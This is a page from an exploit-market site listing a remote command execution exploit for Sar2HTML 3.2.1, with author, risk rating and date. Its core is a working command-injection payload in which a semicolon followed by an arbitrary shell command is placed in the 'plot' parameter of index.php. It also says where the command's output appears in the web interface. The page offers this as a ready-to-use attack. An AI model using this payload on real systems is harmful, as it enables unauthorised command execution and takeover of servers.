[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Sar2HTML 3.2.1 - Remote Command Execution Exploit

Author
Furkan KAYAPINAR
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-33071
Category
web applications
Date add
02-08-2019
Platform
php
# Exploit Title: sar2html Remote Code Execution
# Exploit Author: Furkan KAYAPINAR
# Vendor Homepage:https://github.com/cemtan/sar2html 
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Centos 7

In web application you will see index.php?plot url extension.

http://<ipaddr>/index.php?plot=;<command-here> will execute 
the command you entered. After command injection press "select # host" then your command's 
output will appear bottom side of the scroll screen.

#  0day.today [2024-12-25]  #